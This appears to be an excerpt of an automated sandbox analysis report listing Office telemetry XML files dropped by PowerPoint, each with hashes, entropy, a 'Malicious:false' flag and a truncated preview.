                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703301" V="0" DC="SM" EN="Office.Telemetry.Event.Office.AirTrafficControl.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAirTrafficControl" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContra
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1365
                                                                                                                              Entropy (8bit):4.867179322734424
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9NwDohuMt1k3BNjXMi+EsdnKE+2h6wl/Ffssl:crUohuMteNjXMzbdKshBddl
                                                                                                                              MD5:6646F9BE2FE762564208BA36DD0F31A2
                                                                                                                              SHA1:9E899E1A081FE6D95F2F8C57796B2A1B9E6C7BDE
                                                                                                                              SHA-256:636668AB90D90FCDAFE2AF01594532F455AEC45EED2246D60164D61952D2A84E
                                                                                                                              SHA-512:F299CFEFC3E1DA119C8DA16E446ADD81DC99B12D841CA442108901859FC0AD045363D9753CF787E3AB0F494808BECE63C180EBB6B1E93FF71555407AAA1A9817
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1402
                                                                                                                              Entropy (8bit):4.901565760313767
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9KkDohuct1k3BNjXMi+EsdnKE+2h6wl/Ffssl:c44ohucteNjXMzbdKshBddl
                                                                                                                              MD5:ADD122069E5B52B89CC0D6BBFADC2B0D
                                                                                                                              SHA1:0AD48A61FD49220D2B3C8A6F7BDE62A3594E7454
                                                                                                                              SHA-256:DEDC32D4D2A6646E0ACFF3856668BE0CCA5EB69440FCA35C56386FD9EC5D0996
                                                                                                                              SHA-512:270F3A228429F0014DE76163438689B7AB4360C6597E7E6CF09E5A1759318B67550A2FF1315BF7EC2831C57DA63DE7190540AAF513B858F7E88BFF1D07AC17F0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1387
                                                                                                                              Entropy (8bit):4.8898697870907935
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9NFD7uMt1k3BNjXMi+EsdnKE+2h6wl/FfbpZae:cXl7uMteNjXMzbdKshBdPZ
                                                                                                                              MD5:DD2930326CDD833E3F2768CC47B20046
                                                                                                                              SHA1:2B5C12463D031AFA1547B50B489BA43019B553E5
                                                                                                                              SHA-256:6708BB726F2C7CCE1D19BBA4ACCB228C3483A0483102AE6432CA36DB07411A51
                                                                                                                              SHA-512:1B14C94B3331790E8EC1CB3F608BD7A9A89E61584EE6F0CB7916597FAA913B578E0D34CD89F3319A771F43DEBD2F78CD4D7E416FF6B056442F3C41E1B96F4FEB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1424
                                                                                                                              Entropy (8bit):4.921719665185987
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9KfD7uct1k3BNjXMi+EsdnKE+2h6wl/FfbpZae:ck77ucteNjXMzbdKshBdPZ
                                                                                                                              MD5:6F62B52632B214B3C7A238A3A95630F1
                                                                                                                              SHA1:365422A8C1A579BBDA591CC6BF3F5A7B186D662F
                                                                                                                              SHA-256:9D1A174D7B2953B3EBD03447FE077748A880EE49919935D0CAF58046113F1014
                                                                                                                              SHA-512:FFB96A3674E572E1A50E82464BC896054E756710678B427A67C0BEE86B803FCE5CDEA354800BDCC96FF370B08A52D117981E01A8733B4BF92B8DC53F792ACD49
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1371
                                                                                                                              Entropy (8bit):4.864841997755804
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9LxM7DuXRuMt1k3BNjXMi+EsdnKE+2h6wl/Ff6I8:cFxuQuMteNjXMzbdKshBdm
                                                                                                                              MD5:7FDAA3AC847B46B66090A42F1D5AB013
                                                                                                                              SHA1:492D3930CD2A2EFAB0F90113DF6DB9A543B17B8D
                                                                                                                              SHA-256:F16618618E862E447D756B24C88B67AF60AE14E5097B6AC116DD1300B0C16028
                                                                                                                              SHA-512:0EDF7EC2282DA17BA2CF7B17297CE1DB45118AE017B6CB15BAA867F4228F9DFD13B5F0E09C0C84D33A031FAD0050C843A1E4CF6644ED5FA18308AAFAC059FCA4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1408
                                                                                                                              Entropy (8bit):4.89913278806516
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9AxM5DuXRuct1k3BNjXMi+EsdnKE+2h6wl/Ff6I8:c6x2QucteNjXMzbdKshBdm
                                                                                                                              MD5:E402EE99F54F1E40DAB2C7582A097F8C
                                                                                                                              SHA1:BDEE323A673FBB14DEE7D14E8EE3261B0B65EFD6
                                                                                                                              SHA-256:E10B63C8CFD6F66E82579805B99ED460FCF29063D845004915C5B57C3EA43A45
                                                                                                                              SHA-512:A1DEE904DAFEEDD583996D2E67BF435571FE2866767E0DE70A7125CD4ED312235B9C47A726DD02675D91702F758C2288362A845A400154FDADDE65EA68A39FCD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.859111574808197
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9ni6V0DTuMt1k3BNjXMi+EsdnKE+2h6wl/FfKkt7mu89:cc4oTuMteNjXMzbdKshBdSkt7i
                                                                                                                              MD5:3BD2CC15EF4C839B1C59C96CA807F42E
                                                                                                                              SHA1:8D14EA3DF984F04C18FEEB61294DCADA6AF91AD7
                                                                                                                              SHA-256:52410E5DD10F9318E0E1ED27F5C150C75614CD1BAB59E70971115FF67D5A1525
                                                                                                                              SHA-512:69D81D88C105B15B1AD6FCCD4356315BC14FE58F2633F945715A0C0D0B368BC720C54B0B7D6DA82025A882F9A1BA161EA6290B76C3E2A33E62C655EBB99B40E2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.89492777462298
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9l6+DTuct1k3BNjXMi+EsdnKE+2h6wl/FfKkt7mu89:cv7TucteNjXMzbdKshBdSkt7i
                                                                                                                              MD5:80EBB69E8179832F57512973B75F1208
                                                                                                                              SHA1:5A915AC2D87B3DB7054E34D46D6A467A41C48924
                                                                                                                              SHA-256:DF9125ECA25AFF8FE30A3EAD60B730837564A0EEC8B2BB23F9250EE5EE1E9A03
                                                                                                                              SHA-512:D6E4509CEBC0C62FDB08B34767EBBFE63B775E9FB1CF4160B4D4705A0BC59F412D4D6CD2F2AC57C9532AEC9B09C0C5F5A11E0479205C8558F244BC3ED845DAF1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1371
                                                                                                                              Entropy (8bit):4.876198111520159
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9L3DxuMt1k3BNjXMi+EsdnKE+2h6wl/Ff7ISqxTn:ctzxuMteNjXMzbdKshBdDDqxTn
                                                                                                                              MD5:377AB25CBEEA1DD89D36A96DD2D82A44
                                                                                                                              SHA1:E66602C8B87CB9E3D05B05DD45C8160179904F70
                                                                                                                              SHA-256:0E37FBA93D072F750D2F5E318C49A581C1910445DC9F901A9B957609716770C0
                                                                                                                              SHA-512:AFB84B3D39BB1C0CE475075ACA9A79E79453DED6FEFD5EF0F2F02756AAEEAB8029B3173ACC0ABCDC51DC723348B89E0F6C90B4CC564280FCBE3122342589F009
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703550" V="0" DC="SM" EN="Office.Telemetry.Event.Office.DocumentXRay" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDocumentXRay" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1408
                                                                                                                              Entropy (8bit):4.911520641736649
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9YVDxuct1k3BNjXMi+EsdnKE+2h6wl/Ff7ISqxTn:cqVxucteNjXMzbdKshBdDDqxTn
                                                                                                                              MD5:BD4E2DA8485B6D0BC66D8A0BAEA1734B
                                                                                                                              SHA1:7417F992A74DDA744B626206C4EE454585390B4F
                                                                                                                              SHA-256:D301B6889AA30ED8DFF47EE23122494F245484794BC3D8587F74F828AEA062E8
                                                                                                                              SHA-512:81D480A416E2FF69C9EAA1FDE809066495586D871D8040177EF33F676BD7B8C71AC6055ADB0AF710838F9F32B12A7B63A7BB94B6869B5FD8B3DDFF60DC4EDB0A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703551" V="0" DC="SM" EN="Office.Telemetry.Event.Office.DocumentXRay.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDocumentXRay" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1357
                                                                                                                              Entropy (8bit):4.859441213383502
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d98m+DWuMt1k3BNjXMi+EsdnKE+2h6wl/FfOoZ0Q:cqmOWuMteNjXMzbdKshBdN0Q
                                                                                                                              MD5:27F76678384A95485AE180F16E0185E9
                                                                                                                              SHA1:A1C41002FA958BB20C0B0C84B68B9809C49328B3
                                                                                                                              SHA-256:66E960ACC0AF642EA064AD201CA59597303EFBFC389C3BE925A97ECF167EC7DC
                                                                                                                              SHA-512:96680D31059F9663ABAD45EFA6A5A973A057E69C3DAF62B09645476C2EE5224DF0F0E83BCD104C07C140F1E146930A6827D179E18AAAC6F6E5A9E4BA8A2CF5F8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703600" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Maker" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenMaker" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeIn
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.895873875742196
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d91iGDWuct1k3BNjXMi+EsdnKE+2h6wl/FfOoZ0Q:cTiWWucteNjXMzbdKshBdN0Q
                                                                                                                              MD5:114A3AC4EAF14E47CD9E073586230913
                                                                                                                              SHA1:45087CE9681EE9097DA930F5C73C148158ACD40F
                                                                                                                              SHA-256:41B17C542CD95EA0A28DC436A95B79C128C910918F1D3F44F1A6066A85C00207
                                                                                                                              SHA-512:001A9F69187B56E90C5CC83F89F0A7533E83103318711E015547D47EC466E3CE8EF4A0E071C8207240D4A79B280D4F06C4D157BBEBC8E835C08A41E2D87AE09A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703601" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Maker.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenMaker" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.859074979008148
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9S0DAuMt1k3BNjXMi+EsdnKE+2h6wl/Ff9b1Q:cQoAuMteNjXMzbdKshBdFRQ
                                                                                                                              MD5:9349AC351BD06F127744059870024F71
                                                                                                                              SHA1:B5CBB56FCB74D4CEEAD87FF564DC4F40AB68F992
                                                                                                                              SHA-256:1B15D449E8E450468F8EA5CBA9C8D78715986BA844FDBE4225704C68E65AC9FE
                                                                                                                              SHA-512:471B844789E6B70080F2C7AED4C39EA1130762C0FA6F8128A65CBC91FB12703CB5F74F9E4808CA6B47973E97DCD26EA8402E9C99DF82FD7760C244D2232D44E6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703650" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Groove" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenGroove" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.893131061328472
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9VpeDAuct1k3BNjXMi+EsdnKE+2h6wl/Ff9b1Q:cDcAucteNjXMzbdKshBdFRQ
                                                                                                                              MD5:A3D9E93082257775C9A6A6C7E68C4A16
                                                                                                                              SHA1:0703359A9F07E521BD0167021059A3B1AE73CDFF
                                                                                                                              SHA-256:6C450A8DE75AB9CD4876FC3CCFEEC02D979528DE4BD178FFFA8C42E07E4FEDFE
                                                                                                                              SHA-512:63D95062E7835CC8C221C8830274CB29B00D6C5E1A36453D11E7A34B1E5D42C28F9F4F5F1BBB28124CE4B316B692289B63BB3568A8275D6D54CFB67777278522
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703651" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Groove.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenGroove" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
